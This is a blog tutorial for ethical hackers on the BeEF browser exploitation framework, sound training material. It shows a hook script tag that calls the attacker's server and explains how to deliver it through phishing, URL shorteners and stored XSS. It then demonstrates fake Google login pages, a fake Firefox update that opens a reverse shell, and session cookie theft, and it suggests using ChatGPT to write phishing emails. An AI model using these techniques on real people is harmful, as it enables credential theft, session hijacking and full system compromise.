How to Use the BeEF Hacking Tool (2024)

How to Use the Beef Hacking Tool Hook Browsers Like a Pro

If you want to use the BeEF hacking tool effectively, you've come to the right place. This article is here to help you make the most out of this framework. 

We will explain what BeEF is, how to install it, and how to start it up. We will explore the BeEF web interface and discuss its different components. Additionally, we will explain how BeEF can hook into web browsers, and provide two methods to achieve this.

Furthermore, we will demonstrate three specific use cases of BeEF: Google phishing, creating a fake notification bar that leads to a reverse shell, and stealing session cookies.

So, if you're ready to delve into this client-side framework, let's get started.

What Is BeEF

What is BeEF

BeEF, the Browser Exploitation Framework, is a tool ethical hackers use to assess and exploit vulnerabilities within web browsers.

Unlike many other security tools focusing on system or server-side vulnerabilities, BeEF focuses on the client side – specifically, the user's web browser. This is significant because even if a system's network or operating system is secure, vulnerabilities in a web browser can still provide an attacker with a way into the network or system.

For other Kali tools, see our post on the 25 Top Penetration Testing Tools for Kali Linux.

BeEF has a web-based user interface that allows control over "hooked" web browsers, providing a clear overview of browser details, activity logs, and available command modules. The "hook.js" is a JavaScript file central to BeEF's operation; once loaded by a target's browser, it establishes a communication channel with the BeEF server and gathers comprehensive information about the browser environment.

For ethical hackers, BeEF provides several benefits:

In-Depth Browser Analysis: BeEF can provide detailed information about the hooked browsers, such as the browser type, version, installed plugins, whether the browser is running over Tor, cookies, etc.

Client-Side Exploitation: BeEF has numerous command modules that can aid in exploiting web browsers. These modules can perform various tasks such as stealing cookies, conducting social engineering attacks, launching network attacks, and more.

Real-World Simulation: BeEF allows ethical hackers to mimic real-world attack scenarios, helping organizations understand their risk postures better.

Persistent Access: BeEF can maintain control over a hooked browser even if an IP changes, providing ongoing access to the target for further exploits.

Easy-to-Use Interface: The BeEF interface is web-based and user-friendly, making it easier to manage hooked browsers and execute command modules.

Installing BeEF

BeEF isn’t currently installed on Kali at this time. Ensure you run an update before installing by using the command:

sudo apt update 

You can install BeEF with the following command:

sudo apt install beef-xss

Installing BeEF

Starting BeEF

Once BeEF is installed, you can run it by using:

sudo beef-xss

When running the program for the first time, you will be prompted to change the default password for the ‘beef’ user. 

Starting BeEF

Once you change the password, BeEF will start loading, and you will be presented with both the WebUI address and the hook script for ‘hook.js.’

Web UI: http://127.0.0.1:3000/ui/panel

Hook: <script src="https://127.0.0.1:3000/hook.js"></script>

Before you use the hook script, ensure you change the IP to that of the machine running BeEF.

Starting BeEF

BeEF should open the browser for you, and you will need to log in as the user ‘beef’ with the new password you set up before entering the program.

Login BeEF

BeEF's Interface

Once successfully logged in, you will be presented with the initial BeEF interface. 

BeEF's Interface

Let's look at the different sections within BeEF. 

  1. Hooked Browsers: This is where you'll see a list of all currently hooked browsers. Each browser is listed with details such as IP address, browser name, and operating system. As no browsers are hooked up initially, this section will be empty.
  1. Getting Started: This section provides guidance on how to use the BeEF framework. It includes information on how to hook a browser and use command modules.
  1. Logs: This section shows a log of the BeEF activity. This includes interactions with the target browsers, commands sent, responses received, and any errors or important system messages.
  1. Zombies: In BeEF terminology, a "zombie" is a hooked browser that the BeEF server controls. The "Zombies" section lists these browsers and allows you to interact with them. As no browsers are hooked yet, this section will also be empty.
  1. Basic: This view provides basic information about the hooked browser, such as the IP address, browser type, and operating system. In this view, you can also use the available command modules to interact with the hooked browser.
  1. Requester: The "Requester" view lets you manually craft and send HTTP requests from the hooked browser. This can be useful for exploring the website or web application from the perspective of the hooked browser, testing access controls, or performing other manual testing tasks.

Once you've hooked a browser, the "Hooked Browsers" and "Zombies" sections will be populated with information, and you'll be able to interact with the hooked browsers using the BeEF command modules.

Disclaimer:

The techniques and knowledge shared in this article should only be employed on systems for which you have obtained explicit permissions or on systems you own the rights to conduct testing. 

Unauthorized access is illegal and could lead to legal implications. We strongly urge you to respect digital boundaries.

Hooking Web Browsers with BeEF

Now that you know how to install and start BeEF, let’s explore how to exploit a browser by hooking into it.

What Is Browser Exploitation?

Browser exploitation refers to taking advantage of security vulnerabilities in a web browser to perform unauthorized actions. This can involve various techniques, typically to gain control over the browser or the system on which it's running or to steal sensitive information.

The basic concept behind browser exploitation is that a web browser, like any software, can have flaws or vulnerabilities in its code. These vulnerabilities could cause the browser to behave in unintended ways. 

Most, if not all, current desktop and mobile browsers use JavaScript to serve the user with interactive web pages and applications. 

For more information on JavaScript security, read our post, JavaScript Security: How to Mitigate the Top Risks Now.

With BeEF, an attacker can leverage this widespread use of JavaScript to "hook" a browser, allowing the attacker to exploit potential vulnerabilities, execute commands, and potentially gain unauthorized access or extract sensitive information.

Hooking the Browser

Now that you understand browser exploitation and how BeEF works by injecting a malicious JavaScript file, let’s look at an example. 

BeEF provides links to demo pages within the "Getting Started" section we can use to show proof of concept. In a real-world application, setting up a website or web server to serve the ‘hook.js’ code is a more legitimate way of tricking the victim into being hooked. 

Hooking the Browser

This can be accomplished by creating a website, adding the hook script to the header of the page, and then having the victim visit the site by means of a phishing attack. This could be through a link via email, Social Media, or other means. 

First, let's copy the link for the advanced demo page. You must change the IP address to the one from your attacking machine. This page includes the embedded hook.js script. 

http://10.0.2.15:3000/demos/butcher/index.html

Next, you need to find a way for the user to click on this link. How about crafting a Phishing email with the help of ChatGPT to company employees, letting them know about a contest? 

If you want to see other ways to use Social Engineering, see our post Unlock SET: How to Use The Social Engineer Toolkit.

We can disguise the original URL by using a URL shortener.

URL shortener

Once the user clicks on the link, they won’t be taken to a contest page but to the BeEF demo page, and then it’s game over because we will now have control over their browser.

BeEF demo

We could get creative here and create a legitimate-looking contest form, enabling us to hook into the user’s browser and harvest some information via the form simultaneously. 

Once the user’s browser is hooked, the browser appears in the BeEF console. 

BeEF console

From the details pane, BeEF provides us with a wealth of information. Valuable insights include the browser being utilized, its version, the operating system it runs on, its architecture, platform information, language details, installed plugins, and much more.

How the BeEF Hacking Tool Works

Hooking With XSS

Another way to hook a browser is via XSS (Cross-Site Scripting).  Cross-site scripting is a vulnerability where an attacker loads JavaScript into a web application via user input. This attack could lead to the exposure of sensitive information.

The first step in this process is to find a website vulnerable to cross-site scripting. This will allow us to inject the malicious JavaScript into the site. 

Let’s look at how an attacker could use stored XSS and BeEF to hook a browser. This method can be very effective as it can infect many users. 

Once you’ve found a vulnerable site, inject the ‘hook.js’ JavaScript file into an input field such as "Message" below. 

Hooking With XSS

When the victim's browser visits the site, it loads the file and hooks the browser, enabling us to execute various commands to launch attacks or exfiltrate data. 

Victim's browser visits
Cross-Site Scripting (XSS) Attack with BeEF Hook

Check out this video: "How Your Browser Gets HACKED!"

Exploiting Browser Sessions With BeEF

BeEF comes preloaded with over three hundred modules that you can run depending on the browser hooked. These are broken down into twelve categories, including: “Exploits, Network, and Social Engineering.”

Exploiting Browser Sessions With BeEF

The command modules all include a traffic light icon to show whether these will be invisible and whether they will work within the target browser.

Command modules all include a traffic

We will show you how to use three of these modules.

Google Phishing

The Google Phishing command is a module within BeEF that aims to trick the user of a hooked browser into revealing their Google credentials.

Google Phishing

Let’s execute the command, and on the victim’s browser, they should be presented with the fake login page. 

Execute the command

If the user attempts to sign in, we will have their credentials in the command results tab of the “Google Phishing” module.

Google Phishing

Fake Notification Bar

The Fake Notification Bar command is another module within BeEF designed for social engineering attacks.

When this module is executed on a hooked browser, it displays a fake notification bar at the top of the target browser window. The content of this notification bar can be customized and designed to trick the user into clicking a link or downloading a file.

For our demo, we will be using a reverse shell payload. If the user is tricked into downloading and running the file, it will open a reverse shell to our machine. A reverse shell allows us to execute commands remotely on the victim's system, giving us complete control over it.

For more information on reverse shells, see our reverse shell cheat sheet.

We will use the “Fake Notification Bar (Firefox)” module as the user’s browser is Firefox, but you choose which applies to your situation. 

Fake Notification Bar

Please ensure that you set the “Plugin URL” to the location of the reverse shell. You can leave the “Notification text” or change it to fit your needs. 

We changed our text to read: Critical Security Alert: Your Firefox browser is critically outdated! Click here to install the urgent security update now.

Once we click ‘Execute,” the user will be presented with a notification bar. 

Execute

The user will be prompted to install the plugin by saving the file to their computer. 

Notification bar

Once the user attempts to install the update, we will have a reverse Meterpreter shell giving us full control of the user’s system. 

Meterpreter shell

Session Cookies

Session cookies, also known as temporary cookies, store information about a user's activity for a single browsing session. They help websites remember a user's actions, such as login information or items added to a shopping cart and are deleted when the browser is closed.

We can use the “Get Cookie” module within BeEF to steal session cookies from the user’s browser. Select “Get Cookie” and press the “Execute” button. The session cookies will be displayed in the “Command results” window. 

From an attacker’s perspective, these cookies are valuable as having them allows the attacker to impersonate a user on a website (such as an e-commerce site or the member section of a forum) by taking over the session.

Session Cookies

Conclusion 

The Browser Exploitation Framework, or BeEF, is a powerful tool for ethical hackers, providing a range of capabilities for exploring and hacking web browsers' vulnerabilities.

Throughout this article, we've shown you how to use the BeEF tool and use it to perform three different attacks, one of which enables you to take full control of the user's computer. 

However, the capabilities of BeEF extend far beyond what we've explored here. Diving deeper into its options and functionalities can significantly enhance your proficiency using the BeEF hacking tool. 

By investing time in experimenting with and understanding these additional features, you can elevate your skills and expand your toolkit.

We highly recommend the following courses to learn more about ethical hacking and social engineering tools like BeEF.

FAQs

Level Up in Cyber Security: Join Our Membership Today!

vip cta image
vip cta details
  • Richard Dezso

    Richard is a cyber security enthusiast, eJPT, and ICCA who loves discovering new topics and never stops learning. In his home lab, he's always working on sharpening his offensive cyber security skills. He shares helpful advice through easy-to-understand blog posts that offer practical support for everyone. Additionally, Richard is dedicated to raising awareness for mental health. You can find Richard on LinkedIn, or to see his other projects, visit his Linktree.

  • Tony Hades. says:

    Always insightful and informative. Thank you.

  • Alphonso says:

    This is screwy. Where is the exploit and how is it created? It doesn’t even allude to this but how can you get rce if you don’t have a listener on the target’s machine?

  • >

    StationX Accelerator Pro

    Enter your name and email below, and we’ll swiftly get you all the exciting details about our exclusive StationX Accelerator Pro Program. Stay tuned for more!

    StationX Accelerator Premium

    Enter your name and email below, and we’ll swiftly get you all the exciting details about our exclusive StationX Accelerator Premium Program. Stay tuned for more!

    StationX Master's Program

    Enter your name and email below, and we’ll swiftly get you all the exciting details about our exclusive StationX Master’s Program. Stay tuned for more!